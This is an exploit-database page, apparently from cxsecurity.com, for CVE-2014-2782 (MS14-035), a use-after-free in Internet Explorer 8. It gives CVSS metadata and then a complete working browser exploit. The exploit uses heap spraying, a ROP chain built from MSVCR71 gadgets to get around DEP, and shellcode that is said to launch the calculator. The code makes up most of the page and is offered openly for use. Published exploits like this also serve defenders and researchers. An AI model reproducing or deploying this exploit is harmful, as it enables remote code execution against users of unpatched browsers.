Internet Explorer 8 MS14-035 Use-After-Free Exploit

2014.11.11
Credit: Ayman Sagy
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-2782
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010 // calc shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'></textarea>"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html>

References:

https://www.linkedin.com/in/aymansagy


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top